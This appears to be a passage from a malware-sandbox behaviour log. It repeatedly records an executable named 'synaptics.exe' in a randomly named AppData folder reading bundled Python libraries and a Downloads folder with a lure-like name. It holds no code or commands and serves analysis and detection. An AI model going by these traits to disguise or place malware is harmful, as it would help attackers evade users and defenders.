Source: C:\Users\user\AppData\Local\qkxB9Wn8nG\synaptics.exe	Queries volume information: C:\Users\user\AppData\Local\qkxB9Wn8nG\Lib\urllib VolumeInformation
Source: C:\Users\user\AppData\Local\qkxB9Wn8nG\synaptics.exe	Queries volume information: C:\Users\user\AppData\Local\qkxB9Wn8nG\Lib\urllib VolumeInformation
Source: C:\Users\user\AppData\Local\qkxB9Wn8nG\synaptics.exe	Queries volume information: C:\Users\user\AppData\Local\qkxB9Wn8nG\Lib\urllib\request.py VolumeInformation
Source: C:\Users\user\AppData\Local\qkxB9Wn8nG\synaptics.exe	Queries volume information: C:\Users\user\AppData\Local\qkxB9Wn8nG\Lib\urllib\request.py VolumeInformation
Source: C:\Users\user\AppData\Local\qkxB9Wn8nG\synaptics.exe	Queries volume information: C:\Users\user\AppData\Local\qkxB9Wn8nG\Lib\urllib\request.py VolumeInformation
Source: C:\Users\user\AppData\Local\qkxB9Wn8nG\synaptics.exe	Queries volume information: C:\Users\user\AppData\Local\qkxB9Wn8nG\Lib\urllib\request.py VolumeInformation
Source: C:\Users\user\AppData\Local\qkxB9Wn8nG\synaptics.exe	Queries volume information: C:\Users\user\AppData\Local\qkxB9Wn8nG\Lib\urllib\request.py VolumeInformation
Source: C:\Users\user\AppData\Local\qkxB9Wn8nG\synaptics.exe	Queries volume information: C:\Users\user\AppData\Local\qkxB9Wn8nG\Lib\urllib\__pycache__ VolumeInformation
Source: C:\Users\user\AppData\Local\qkxB9Wn8nG\synaptics.exe	Queries volume information: C:\Users\user\AppData\Local\qkxB9Wn8nG\Lib\urllib\__pycache__\request.cpython-310.pyc.25167088 VolumeInformation
Source: C:\Users\user\AppData\Local\qkxB9Wn8nG\synaptics.exe	Queries volume information: C:\Users\user\Downloads\Compilation of copyright-protected videos and images VolumeInformation
Source: C:\Users\user\AppData\Local\qkxB9Wn8nG\synaptics.exe	Queries volume information: C:\Users\user\AppData\Local\qkxB9Wn8nG\DLLs VolumeInformation
Source: C:\Users\user\AppData\Local\qkxB9Wn8nG\synaptics.exe	Queries volume information: C:\Users\user\AppData\Local\qkxB9Wn8nG\Lib VolumeInformation
Source: C:\Users\user\AppData\Local\qkxB9Wn8nG\synaptics.exe	Queries volume information: C:\Users\user\AppData\Local\qkxB9Wn8nG\Lib\bisect.py VolumeInformation
Source: C:\Users\user\AppData\Local\qkxB9Wn8nG\synaptics.exe	Queries volume information: C:\Users\user\AppData\Local\qkxB9Wn8nG\Lib\bisect.py VolumeInformation
Source: C:\Users\user\AppData\Local\qkxB9Wn8nG\synaptics.exe	Queries volume information: C:\Users\user\AppData\Local\qkxB9Wn8nG\Lib\bisect.py VolumeInformation
Source: C:\Users\user\AppData\Local\qkxB9Wn8nG\synaptics.exe	Queries volume information: C:\Users\user\AppData\Local\qkxB9Wn8nG\Lib\bisect.py VolumeInformation
Source: C:\Users\user\AppData\Local\qkxB9Wn8nG\synaptics.exe	Queries volume information: C:\Users\user\AppData\Local\qkxB9Wn8nG\Lib\bisect.py VolumeInformation
Source: C:\Users\user\AppData\Local\qkxB9Wn8nG\synaptics.exe	Queries volume information: C:\Users\user\AppData\Local\qkxB9Wn8nG\Lib\__pycache__ VolumeInformation
Source: C:\Users\user\AppData\Local\qkxB9Wn8nG\synaptics.exe	Queries volume information: C:\Users\user\AppData\Local\qkxB9Wn8nG\Lib\__pycache__\bisect.cpython-310.pyc.29715744 VolumeInformation
Source: C:\Users\user\AppData\Local\qkxB9Wn8nG\synaptics.exe	Queries volume information: C:\Users\user\Downloads\Compilation of copyright-protected videos and images VolumeInformation
Source: C:\Users\user\AppData\Local\qkxB9Wn8nG\synaptics.exe	Queries volume information: C:\Users\user\AppData\Local\qkxB9Wn8nG\DLLs VolumeInformation
Source: C:\Users\user\AppData\Local\qkxB9Wn8nG\synaptics.exe	Queries volume information: C:\Users\user\AppData\Local\qkxB9Wn8nG\Lib\email\__init__.py VolumeInformation
Source: C:\Users\user\AppData\Local\qkxB9Wn8nG\synaptics.exe	Queries volume information: C:\Users\user\AppData\Local\qkxB9Wn8nG\Lib\email\__init__.py VolumeInformation
Source: C:\Users\user\AppData\Local\qkxB9Wn8nG\synaptics.exe	Queries volume information: C:\Users\user\AppData\Local\qkxB9Wn8nG\Lib\email\__init__.py VolumeInformation
Source: C:\Users\user\AppData\Local\qkxB9Wn8nG\synaptics.exe	Queries volume information: C:\Users\user\AppData\Local\qkxB9Wn8nG\Lib\email\__init__.py VolumeInformation
Source: C:\Users\user\AppData\Local\qkxB9Wn8nG\synaptics.exe	Queries volume information: C:\Users\user\AppData\Local\qkxB9Wn8nG\Lib\email\__init__.py VolumeInformation
Source: C:\Users\user\AppData\Local\qkxB9Wn8nG\synaptics.exe	Queries volume information: C:\Users\user\AppData\Local\qkxB9Wn8nG\Lib\email VolumeInformation
Source: C:\Users\user\AppData\Local\qkxB9Wn8nG\synaptics.exe	Queries volume information: C:\Users\user\AppData\Local\qkxB9Wn8nG\Lib\email\__pycache__\__init__.cpython-310.pyc.25168880 VolumeInformation
Source: C:\Users\user\AppData\Local\qkxB9Wn8nG\synaptics.exe	Queries volume information: C:\Users\user\Downloads\Compilation of copyright-protected videos and images VolumeInformation
Source: C:\Users\user\AppData\Local\qkxB9Wn8nG\synaptics.exe	Queries volume information: C:\Users\user\AppData\Local\qkxB9Wn8nG\Lib\hashlib.py VolumeInformation
Source: C:\Users\user\AppData\Local\qkxB9Wn8nG\synaptics.exe	Queries volume information: C:\Users\user\AppData\Local\qkxB9Wn8nG\Lib\hashlib.py VolumeInformation
Source: C:\Users\user\AppData\Local\qkxB9Wn8nG\synaptics.exe	Queries volume information: C:\Users\user\AppData\Local\qkxB9Wn8nG\Lib\hashlib.py VolumeInformation
Source: C:\Users\user\AppData\Local\qkxB9Wn8nG\synaptics.exe	Queries volume information: C:\Users\user\AppData\Local\qkxB9Wn8nG\Lib\hashlib.py VolumeInformation
Source: C:\Users\user\AppData\Local\qkxB9Wn8nG\synaptics.exe	Queries volume information: C:\Users\user\AppData\Local\qkxB9Wn8nG\Lib\__pycache__ VolumeInformation
Source: C:\Users\user\AppData\Local\qkxB9Wn8nG\synaptics.exe	Queries volume information: C:\Users\user\AppData\Local\qkxB9Wn8nG\Lib\__pycache__\hashlib.cpython-310.pyc.29771944 VolumeInformation
Source: C:\Users\user\AppData\Local\qkxB9Wn8nG\synaptics.exe	Queries volume information: C:\Users\user\Downloads\Compilation of copyright-protected videos and images VolumeInformation
Source: C:\Users\user\AppData\Local\qkxB9Wn8nG\synaptics.exe	Queries volume information: C:\Users\user\AppData\Local\qkxB9Wn8nG\DLLs\_hashlib.pyd VolumeInformation
Source: C:\Users\user\AppData\Local\qkxB9Wn8nG\synaptics.exe	Queries volume information: C:\Users\user\Downloads\Compilation of copyright-protected videos and images VolumeInformation
Source: C:\Users\user\AppData\Local\qkxB9Wn8nG\synaptics.exe	Queries volume information: C:\Users\user\AppData\Local\qkxB9Wn8nG\Lib\http\__init__.py VolumeInformation
Source: C:\Users\user\AppData\Local\qkxB9Wn8nG\synaptics.exe	Queries volume information: C:\Users\user\AppData\Local\qkxB9Wn8nG\Lib\http\__init__.py VolumeInformation
Source: C:\Users\user\AppData\Local\qkxB9Wn8nG\synaptics.exe	Queries volume information: C:\Users\user\AppData\Local\qkxB9Wn8nG\Lib\http\__init__.py VolumeInformation
Source: C:\Users\user\AppData\Local\qkxB9Wn8nG\synaptics.exe	Queries volume information: C:\Users\user\AppData\Local\qkxB9Wn8nG\Lib\http\__init__.py VolumeInformation
Source: C:\Users\user\AppData\Local\qkxB9Wn8nG\synaptics.exe	Queries volume information: C:\Users\user\AppData\Local\qkxB9Wn8nG\Lib\http\__init__.py VolumeInformation
Source: C:\Users\user\AppData\Local\qkxB9Wn8nG\synaptics.exe	Queries volume information: C:\Users\user\AppData\Local\qkxB9Wn8nG\Lib\http VolumeInformation
Source: C:\Users\user\AppData\Local\qkxB9Wn8nG\synaptics.exe	Queries volume information: C:\Users\user\AppData\Local\qkxB9Wn8nG\Lib\http\__pycache__\__init__.cpython-310.pyc.25168208 VolumeInformation
Source: C:\Users\user\AppData\Local\qkxB9Wn8nG\synaptics.exe	Queries volume information: C:\Users\user\AppData\Local\qkxB9Wn8nG\Lib\http VolumeInformation
Source: C:\Users\user\AppData\Local\qkxB9Wn8nG\synaptics.exe	Queries volume information: C:\Users\user\AppData\Local\qkxB9Wn8nG\Lib\http VolumeInformation
Source: C:\Users\user\AppData\Local\qkxB9Wn8nG\synaptics.exe	Queries volume information: C:\Users\user\AppData\Local\qkxB9Wn8nG\Lib\http VolumeInformation
Source: C:\Users\user\AppData\Local\qkxB9Wn8nG\synaptics.exe	Queries volume information: C:\Users\user\AppData\Local\qkxB9Wn8nG\Lib\http\client.py VolumeInformation
Source: C:\Users\user\AppData\Local\qkxB9Wn8nG\synaptics.exe	Queries volume information: C:\Users\user\AppData\Local\qkxB9Wn8nG\Lib\http\client.py VolumeInformation
Source: C:\Users\user\AppData\Local\qkxB9Wn8nG\synaptics.exe	Queries volume information: C:\Users\user\AppData\Local\qkxB9Wn8nG\Lib\http\client.py VolumeInformation
Source: C:\Users\user\AppData\Local\qkxB9Wn8nG\synaptics.exe	Queries volume information: C:\Users\user\AppData\Local\qkxB9Wn8nG\Lib\http\client.py VolumeInformation
Source: C:\Users\user\AppData\Local\qkxB9Wn8nG\synaptics.exe	Queries volume information: C:\Users\user\AppData\Local\qkxB9Wn8nG\Lib\http\client.py VolumeInformation
Source: C:\Users\user\AppData\Local\qkxB9Wn8nG\synaptics.exe	Queries volume information: C:\Users\user\AppData\Local\qkxB9Wn8nG\Lib\http\__pycache__ VolumeInformation
Source: C:\Users\user\AppData\Local\qkxB9Wn8nG\synaptics.exe	Queries volume information: C:\Users\user\AppData\Local\qkxB9Wn8nG\Lib\http\__pycache__\client.cpython-310.pyc.25169776 VolumeInformation
Source: C:\Users\user\AppData\Local\qkxB9Wn8nG\synaptics.exe	Queries volume information: C:\Users\user\AppData\Local\qkxB9Wn8nG\Lib\email VolumeInformation
Source: C:\Users\user\AppData\Local\qkxB9Wn8nG\synaptics.exe	Queries volume information: C:\Users\user\AppData\Local\qkxB9Wn8nG\Lib\email VolumeInformation
Source: C:\Users\user\AppData\Local\qkxB9Wn8nG\synaptics.exe	Queries volume information: C:\Users\user\AppData\Local\qkxB9Wn8nG\Lib\email VolumeInformation
Source: C:\Users\user\AppData\Local\qkxB9Wn8nG\synaptics.exe	Queries volume information: C:\Users\user\AppData\Local\qkxB9Wn8nG\Lib\email\parser.py VolumeInformation
Source: C:\Users\user\AppData\Local\qkxB9Wn8nG\synaptics.exe	Queries volume information: C:\Users\user\AppData\Local\qkxB9Wn8nG\Lib\email\parser.py VolumeInformation
Source: C:\Users\user\AppData\Local\qkxB9Wn8nG\synaptics.exe	Queries volume information: C:\Users\user\AppData\Local\qkxB9Wn8nG\Lib\email\parser.py VolumeInformation
Source: C:\Users\user\AppData\Local\qkxB9Wn8nG\synaptics.exe	Queries volume information: C:\Users\user\AppData\Local\qkxB9Wn8nG\Lib\email\parser.py VolumeInformation
Source: C:\Users\user\AppData\Local\qkxB9Wn8nG\synaptics.exe	Queries volume information: C:\Users\user\AppData\Local\qkxB9Wn8nG\Lib\email\__pycache__ VolumeInformation
Source: C:\Users\user\AppData\Local\qkxB9Wn8nG\synaptics.exe	Queries volume information: C:\Users\user\AppData\Local\qkxB9Wn8nG\Lib\email\__pycache__\parser.cpython-310.pyc.29631056 VolumeInformation
Source: C:\Users\user\AppData\Local\qkxB9Wn8nG\synaptics.exe	Queries volume information: C:\Users\user\AppData\Local\qkxB9Wn8nG\Lib\email VolumeInformation
Source: C:\Users\user\AppData\Local\qkxB9Wn8nG\synaptics.exe	Queries volume information: C:\Users\user\AppData\Local\qkxB9Wn8nG\Lib\email\feedparser.py VolumeInformation
Source: C:\Users\user\AppData\Local\qkxB9Wn8nG\synaptics.exe	Queries volume information: C:\Users\user\AppData\Local\qkxB9Wn8nG\Lib\email\feedparser.py VolumeInformation
Source: C:\Users\user\AppData\Local\qkxB9Wn8nG\synaptics.exe	Queries volume information: C:\Users\user\AppData\Local\qkxB9Wn8nG\Lib\email\feedparser.py VolumeInformation
Source: C:\Users\user\AppData\Local\qkxB9Wn8nG\synaptics.exe	Queries volume information: C:\Users\user\AppData\Local\qkxB9Wn8nG\Lib\email\feedparser.py VolumeInformation
Source: C:\Users\user\AppData\Local\qkxB9Wn8nG\synaptics.exe	Queries volume information: C:\Users\user\AppData\Local\qkxB9Wn8nG\Lib\email\__pycache__ VolumeInformation
Source: C:\Users\user\AppData\Local\qkxB9Wn8nG\synaptics.exe	Queries volume information: C:\Users\user\AppData\Local\qkxB9Wn8nG\Lib\email\__pycache__\feedparser.cpython-310.pyc.29631168 VolumeInformation
Source: C:\Users\user\AppData\Local\qkxB9Wn8nG\synaptics.exe	Queries volume information: C:\Users\user\AppData\Local\qkxB9Wn8nG\Lib\email VolumeInformation
Source: C:\Users\user\AppData\Local\qkxB9Wn8nG\synaptics.exe	Queries volume information: C:\Users\user\AppData\Local\qkxB9Wn8nG\Lib\email\errors.py VolumeInformation
Source: C:\Users\user\AppData\Local\qkxB9Wn8nG\synaptics.exe	Queries volume information: C:\Users\user\AppData\Local\qkxB9Wn8nG\Lib\email\errors.py VolumeInformation
Source: C:\Users\user\AppData\Local\qkxB9Wn8nG\synaptics.exe	Queries volume information: C:\Users\user\AppData\Local\qkxB9Wn8nG\Lib\email\errors.py VolumeInformation
Source: C:\Users\user\AppData\Local\qkxB9Wn8nG\synaptics.exe	Queries volume information: C:\Users\user\AppData\Local\qkxB9Wn8nG\Lib\email\errors.py VolumeInformation
Source: C:\Users\user\AppData\Local\qkxB9Wn8nG\synaptics.exe	Queries volume information: C:\Users\user\AppData\Local\qkxB9Wn8nG\Lib\email\errors.py VolumeInformation
Source: C:\Users\user\AppData\Local\qkxB9Wn8nG\synaptics.exe	Queries volume information: C:\Users\user\AppData\Local\qkxB9Wn8nG\Lib\email\__pycache__ VolumeInformation
Source: C:\Users\user\AppData\Local\qkxB9Wn8nG\synaptics.exe	Queries volume information: C:\Users\user\AppData\Local\qkxB9Wn8nG\Lib\email\__pycache__\errors.cpython-310.pyc.29631392 VolumeInformation
Source: C:\Users\user\AppData\Local\qkxB9Wn8nG\synaptics.exe	Queries volume information: C:\Users\user\AppData\Local\qkxB9Wn8nG\Lib\email VolumeInformation
Source: C:\Users\user\AppData\Local\qkxB9Wn8nG\synaptics.exe	Queries volume information: C:\Users\user\AppData\Local\qkxB9Wn8nG\Lib\email\_policybase.py VolumeInformation
Source: C:\Users\user\AppData\Local\qkxB9Wn8nG\synaptics.exe	Queries volume information: C:\Users\user\AppData\Local\qkxB9Wn8nG\Lib\email\_policybase.py VolumeInformation
Source: C:\Users\user\AppData\Local\qkxB9Wn8nG\synaptics.exe	Queries volume information: C:\Users\user\AppData\Local\qkxB9Wn8nG\Lib\email\_policybase.py VolumeInformation
Source: C:\Users\user\AppData\Local\qkxB9Wn8nG\synaptics.exe	Queries volume information: C:\Users\user\AppData\Local\qkxB9Wn8nG\Lib\email\_policybase.py VolumeInformation
Source: C:\Users\user\AppData\Local\qkxB9Wn8nG\synaptics.exe	Queries volume information: C:\Users\user\AppData\Local\qkxB9Wn8nG\Lib\email\_policybase.py VolumeInformation
Source: C:\Users\user\AppData\Local\qkxB9Wn8nG\synaptics.exe	Queries volume information: C:\Users\user\AppData\Local\qkxB9Wn8nG\Lib\email\__pycache__ VolumeInformation
Source: C:\Users\user\AppData\Local\qkxB9Wn8nG\synaptics.exe	Queries volume information: C:\Users\user\AppData\Local\qkxB9Wn8nG\Lib\email\__pycache__\_policybase.cpython-310.pyc.23948968 VolumeInformation
Source: C:\Users\user\AppData\Local\qkxB9Wn8nG\synaptics.exe	Queries volume information: C:\Users\user\AppData\Local\qkxB9Wn8nG\Lib\email VolumeInformation
Source: C:\Users\user\AppData\Local\qkxB9Wn8nG\synaptics.exe	Queries volume information: C:\Users\user\AppData\Local\qkxB9Wn8nG\Lib\email\header.py VolumeInformation
Source: C:\Users\user\AppData\Local\qkxB9Wn8nG\synaptics.exe	Queries volume information: C:\Users\user\AppData\Local\qkxB9Wn8nG\Lib\email\header.py VolumeInformation
Source: C:\Users\user\AppData\Local\qkxB9Wn8nG\synaptics.exe	Queries volume information: C:\Users\user\AppData\Local\qkxB9Wn8nG\Lib\email\header.py VolumeInformation
Source: C:\Users\user\AppData\Local\qkxB9Wn8nG\synaptics.exe	Queries volume information: C:\Users\user\AppData\Local\qkxB9Wn8nG\Lib\email\header.py VolumeInformation
Source: C:\Users\user\AppData\Local\qkxB9Wn8nG\synaptics.exe	Queries volume information: C:\Users\user\AppData\Local\qkxB9Wn8nG\Lib\email\header.py VolumeInformation
Source: C:\Users\user\AppData\Local\qkxB9Wn8nG\synaptics.exe	Queries volume information: C:\Users\user\AppData\Local\qkxB9Wn8nG\Lib\email\__pycache__ VolumeInformation
Source: C:\Users\user\AppData\Local\qkxB9Wn8nG\synaptics.exe	Queries volume information: C:\Users\user\AppData\Local\qkxB9Wn8nG\Lib\email\__pycache__\header.cpython-310.pyc.29631280 VolumeInformation
Source: C:\Users\user\AppData\Local\qkxB9Wn8nG\synaptics.exe	Queries volume information: C:\Users\user\AppData\Local\qkxB9Wn8nG\Lib\email VolumeInformation
Source: C:\Users\user\AppData\Local\qkxB9Wn8nG\synaptics.exe	Queries volume information: C:\Users\user\AppData\Local\qkxB9Wn8nG\Lib\email\quoprimime.py VolumeInformation
Source: C:\Users\user\AppData\Local\qkxB9Wn8nG\synaptics.exe	Queries volume information: C:\Users\user\AppData\Local\qkxB9Wn8nG\Lib\email\quoprimime.py VolumeInformation
Source: C:\Users\user\AppData\Local\qkxB9Wn8nG\synaptics.exe	Queries volume information: C:\Users\user\AppData\Local\qkxB9Wn8nG\Lib\email\quoprimime.py VolumeInformation
Source: C:\Users\user\AppData\Local\qkxB9Wn8nG\synaptics.exe	Queries volume information: C:\Users\user\AppData\Local\qkxB9Wn8nG\Lib\email\quoprimime.py VolumeInformation
Source: C:\Users\user\AppData\Local\qkxB9Wn8nG\synaptics.exe	Queries volume information: C:\Users\user\AppData\Local\qkxB9Wn8nG\Lib\email\quoprimime.py VolumeInformation
Source: C:\Users\user\AppData\Local\qkxB9Wn8nG\synaptics.exe	Queries volume information: C:\Users\user\AppData\Local\qkxB9Wn8nG\Lib\email\__pycache__ VolumeInformation
Source: C:\Users\user\AppData\Local\qkxB9Wn8nG\synaptics.exe	Queries volume information: C:\Users\user\AppData\Local\qkxB9Wn8nG\Lib\email\__pycache__\quoprimime.cpython-310.pyc.29630720 VolumeInformation
Source: C:\Users\user\AppData\Local\qkxB9Wn8nG\synaptics.exe	Queries volume information: C:\Users\user\Downloads\Compilation of copyright-protected videos and images VolumeInformation
Source: C:\Users\user\AppData\Local\qkxB9Wn8nG\synaptics.exe	Queries volume information: C:\Users\user\AppData\Local\qkxB9Wn8nG\DLLs VolumeInformation
Source: C:\Users\user\AppData\Local\qkxB9Wn8nG\synaptics.exe	Queries volume information: C:\Users\user\AppData\Local\qkxB9Wn8nG\Lib VolumeInformation
Source: C:\Users\user\AppData\Local\qkxB9Wn8nG\synaptics.exe	Queries volume information: C:\Users\user\AppData\Local\qkxB9Wn8nG\Lib\string.py VolumeInformation
Source: C:\Users\user\AppData\Local\qkxB9Wn8nG\synaptics.exe	Queries volume information: C:\Users\user\AppData\Local\qkxB9Wn8nG\Lib\string.py VolumeInformation
Source: C:\Users\user\AppData\Local\qkxB9Wn8nG\synaptics.exe	Queries volume information: C:\Users\user\AppData\Local\qkxB9Wn8nG\Lib\string.py VolumeInformation
Source: C:\Users\user\AppData\Local\qkxB9Wn8nG\synaptics.exe	Queries volume information: C:\Users\user\AppData\Local\qkxB9Wn8nG\Lib\string.py VolumeInformation
Source: C:\Users\user\AppData\Local\qkxB9Wn8nG\synaptics.exe	Queries volume information: C:\Users\user\AppData\Local\qkxB9Wn8nG\Lib\string.py VolumeInformation
Source: C:\Users\user\AppData\Local\qkxB9Wn8nG\synaptics.exe	Queries volume information: C:\Users\user\AppData\Local\qkxB9Wn8nG\Lib\__pycache__ VolumeInformation
Source: C:\Users\user\AppData\Local\qkxB9Wn8nG\synaptics.exe	Queries volume information: C:\Users\user\AppData\Local\qkxB9Wn8nG\Lib\__pycache__\string.cpython-310.pyc.30123368 VolumeInformation
Source: C:\Users\user\AppData\Local\qkxB9Wn8nG\synaptics.exe	Queries volume information: C:\Users\user\AppData\Local\qkxB9Wn8nG\Lib\email VolumeInformation
Source: C:\Users\user\AppData\Local\qkxB9Wn8nG\synaptics.exe	Queries volume information: C:\Users\user\AppData\Local\qkxB9Wn8nG\Lib\email\base64mime.py VolumeInformation
Source: C:\Users\user\AppData\Local\qkxB9Wn8nG\synaptics.exe	Queries volume information: C:\Users\user\AppData\Local\qkxB9Wn8nG\Lib\email\base64mime.py VolumeInformation
Source: C:\Users\user\AppData\Local\qkxB9Wn8nG\synaptics.exe	Queries volume information: C:\Users\user\AppData\Local\qkxB9Wn8nG\Lib\email\base64mime.py VolumeInformation
Source: C:\Users\user\AppData\Local\qkxB9Wn8nG\synaptics.exe	Queries volume information: C:\Users\user\AppData\Local\qkxB9Wn8nG\Lib\email\base64mime.py VolumeInformation
Source: C:\Users\user\AppData\Local\qkxB9Wn8nG\synaptics.exe	Queries volume information: C:\Users\user\AppData\Local\qkxB9Wn8nG\Lib\email\base64mime.py VolumeInformation
Source: C:\Users\user\AppData\Local\qkxB9Wn8nG\synaptics.exe	Queries volume information: C:\Users\user\AppData\Local\qkxB9Wn8nG\Lib\email\__pycache__ VolumeInformation
Source: C:\Users\user\AppData\Local\qkxB9Wn8nG\synaptics.exe	Queries volume information: C:\Users\user\AppData\Local\qkxB9Wn8nG\Lib\email\__pycache__\base64mime.cpython-310.pyc.29631392 VolumeInformation
Source: C:\Users\user\AppData\Local\qkxB9Wn8nG\synaptics.exe	Queries volume information: C:\Users\user\AppData\Local\qkxB9Wn8nG\Lib\email VolumeInformation
Source: C:\Users\user\AppData\Local\qkxB9Wn8nG\synaptics.exe	Queries volume information: C:\Users\user\AppData\Local\qkxB9Wn8nG\Lib\email\charset.py VolumeInformation
Source: C:\Users\user\AppData\Local\qkxB9Wn8nG\synaptics.exe	Queries volume information: C:\Users\user\AppData\Local\qkxB9Wn8nG\Lib\email\charset.py VolumeInformation
Source: C:\Users\user\AppData\Local\qkxB9Wn8nG\synaptics.exe	Queries volume information: C:\Users\user\AppData\Local\qkxB9Wn8nG\Lib\email\charset.py VolumeInformation
Source: C:\Users\user\AppData\Local\qkxB9Wn8nG\synaptics.exe	Queries volume information: C:\Users\user\AppData\Local\qkxB9Wn8nG\Lib\email\charset.py VolumeInformation
Source: C:\Users\user\AppData\Local\qkxB9Wn8nG\synaptics.exe	Queries volume information: C:\Users\user\AppData\Local\qkxB9Wn8nG\Lib\email\charset.py VolumeInformation
Source: C:\Users\user\AppData\Local\qkxB9Wn8nG\synaptics.exe	Queries volume information: C:\Users\user\AppData\Local\qkxB9Wn8nG\Lib\email\__pycache__ VolumeInformation
Source: C:\Users\user\AppData\Local\qkxB9Wn8nG\synaptics.exe	Queries volume information: C:\Users\user\AppData\Local\qkxB9Wn8nG\Lib\email\__pycache__\charset.cpython-310.pyc.29631280 VolumeInformation
Source: C:\Users\user\AppData\Local\qkxB9Wn8nG\synaptics.exe	Queries volume information: C:\Users\user\AppData\Local\qkxB9Wn8nG\Lib\email VolumeInformation
Source: C:\Users\user\AppData\Local\qkxB9Wn8nG\synaptics.exe	Queries volume information: C:\Users\user\AppData\Local\qkxB9Wn8nG\Lib\email\encoders.py VolumeInformation
Source: C:\Users\user\AppData\Local\qkxB9Wn8nG\synaptics.exe	Queries volume information: C:\Users\user\AppData\Local\qkxB9Wn8nG\Lib\email\encoders.py VolumeInformation
Source: C:\Users\user\AppData\Local\qkxB9Wn8nG\synaptics.exe	Queries volume information: C:\Users\user\AppData\Local\qkxB9Wn8nG\Lib\email\encoders.py VolumeInformation
Source: C:\Users\user\AppData\Local\qkxB9Wn8nG\synaptics.exe	Queries volume information: C:\Users\user\AppData\Local\qkxB9Wn8nG\Lib\email\encoders.py VolumeInformation
Source: C:\Users\user\AppData\Local\qkxB9Wn8nG\synaptics.exe	Queries volume information: C:\Users\user\AppData\Local\qkxB9Wn8nG\Lib\email\encoders.py VolumeInformation
Source: C:\Users\user\AppData\Local\qkxB9Wn8nG\synaptics.exe	Queries volume information: C:\Users\user\AppData\Local\qkxB9Wn8nG\Lib\email\__pycache__ VolumeInformation
Source: C:\Users\user\AppData\Local\qkxB9Wn8nG\synaptics.exe	Queries volume information: C:\Users\user\AppData\Local\qkxB9Wn8nG\Lib\email\__pycache__\encoders.cpython-310.pyc.29630720 VolumeInformation
Source: C:\Users\user\AppData\Local\qkxB9Wn8nG\synaptics.exe	Queries volume information: C:\Users\user\Downloads\Compilation of copyright-protected videos and images VolumeInformation
Source: C:\Users\user\AppData\Local\qkxB9Wn8nG\synaptics.exe	Queries volume information: C:\Users\user\AppData\Local\qkxB9Wn8nG\Lib\quopri.py VolumeInformation
Source: C:\Users\user\AppData\Local\qkxB9Wn8nG\synaptics.exe	Queries volume information: C:\Users\user\AppData\Local\qkxB9Wn8nG\Lib\quopri.py VolumeInformation
Source: C:\Users\user\AppData\Local\qkxB9Wn8nG\synaptics.exe	Queries volume information: C:\Users\user\AppData\Local\qkxB9Wn8nG\Lib\quopri.py VolumeInformation
Source: C:\Users\user\AppData\Local\qkxB9Wn8nG\synaptics.exe	Queries volume information: C:\Users\user\AppData\Local\qkxB9Wn8nG\Lib\quopri.py VolumeInformation
Source: C:\Users\user\AppData\Local\qkxB9Wn8nG\synaptics.exe	Queries volume information: C:\Users\user\AppData\Local\qkxB9Wn8nG\Lib\quopri.py VolumeInformation
Source: C:\Users\user\AppData\Local\qkxB9Wn8nG\synaptics.exe	Queries volume information: C:\Users\user\AppData\Local\qkxB9Wn8nG\Lib\__pycache__ VolumeInformation
Source: C:\Users\user\AppData\Local\qkxB9Wn8nG\synaptics.exe	Queries volume information: C:\Users\user\AppData\Local\qkxB9Wn8nG\Lib\__pycache__\quopri.cpython-310.pyc.30218304 VolumeInformation
Source: C:\Users\user\AppData\Local\qkxB9Wn8nG\synaptics.exe	Queries volume information: C:\Users\user\AppData\Local\qkxB9Wn8nG\Lib\email VolumeInformation
Source: C:\Users\user\AppData\Local\qkxB9Wn8nG\synaptics.exe	Queries volume information: C:\Users\user\AppData\Local\qkxB9Wn8nG\Lib\email\utils.py VolumeInformation
Source: C:\Users\user\AppData\Local\qkxB9Wn8nG\synaptics.exe	Queries volume information: C:\Users\user\AppData\Local\qkxB9Wn8nG\Lib\email\utils.py VolumeInformation
Source: C:\Users\user\AppData\Local\qkxB9Wn8nG\synaptics.exe	Queries volume information: C:\Users\user\AppData\Local\qkxB9Wn8nG\Lib\email\utils.py VolumeInformation
Source: C:\Users\user\AppData\Local\qkxB9Wn8nG\synaptics.exe	Queries volume information: C:\Users\user\AppData\Local\qkxB9Wn8nG\Lib\email\utils.py VolumeInformation
Source: C:\Users\user\AppData\Local\qkxB9Wn8nG\synaptics.exe	Queries volume information: C:\Users\user\AppData\Local\qkxB9Wn8nG\Lib\email\__pycache__ VolumeInformation
Source: C:\Users\user\AppData\Local\qkxB9Wn8nG\synaptics.exe	Queries volume information: C:\Users\user\AppData\Local\qkxB9Wn8nG\Lib\email\__pycache__\utils.cpython-310.pyc.29631392 VolumeInformation
Source: C:\Users\user\AppData\Local\qkxB9Wn8nG\synaptics.exe	Queries volume information: C:\Users\user\Downloads\Compilation of copyright-protected videos and images VolumeInformation
Source: C:\Users\user\AppData\Local\qkxB9Wn8nG\synaptics.exe	Queries volume information: C:\Users\user\AppData\Local\qkxB9Wn8nG\Lib\random.py VolumeInformation
Source: C:\Users\user\AppData\Local\qkxB9Wn8nG\synaptics.exe	Queries volume information: C:\Users\user\AppData\Local\qkxB9Wn8nG\Lib\random.py VolumeInformation
Source: C:\Users\user\AppData\Local\qkxB9Wn8nG\synaptics.exe	Queries volume information: C:\Users\user\AppData\Local\qkxB9Wn8nG\Lib\random.py VolumeInformation
Source: C:\Users\user\AppData\Local\qkxB9Wn8nG\synaptics.exe	Queries volume information: C:\Users\user\AppData\Local\qkxB9Wn8nG\Lib\random.py VolumeInformation
Source: C:\Users\user\AppData\Local\qkxB9Wn8nG\synaptics.exe	Queries volume information: C:\Users\user\AppData\Local\qkxB9Wn8nG\Lib\random.py VolumeInformation
Source: C:\Users\user\AppData\Local\qkxB9Wn8nG\synaptics.exe	Queries volume information: C:\Users\user\AppData\Local\qkxB9Wn8nG\Lib\__pycache__ VolumeInformation
Source: C:\Users\user\AppData\Local\qkxB9Wn8nG\synaptics.exe	Queries volume information: C:\Users\user\AppData\Local\qkxB9Wn8nG\Lib\__pycache__\random.cpython-310.pyc.30249408 VolumeInformation
Source: C:\Users\user\AppData\Local\qkxB9Wn8nG\synaptics.exe	Queries volume information: C:\Users\user\Downloads\Compilation of copyright-protected videos and images VolumeInformation
Source: C:\Users\user\AppData\Local\qkxB9Wn8nG\synaptics.exe	Queries volume information: C:\Users\user\AppData\Local\qkxB9Wn8nG\DLLs VolumeInformation
Source: C:\Users\user\AppData\Local\qkxB9Wn8nG\synaptics.exe	Queries volume information: C:\Users\user\AppData\Local\qkxB9Wn8nG\Lib VolumeInformation
Source: C:\Users\user\AppData\Local\qkxB9Wn8nG\synaptics.exe	Queries volume information: C:\Users\user\AppData\Local\qkxB9Wn8nG\Lib\warnings.py VolumeInformation
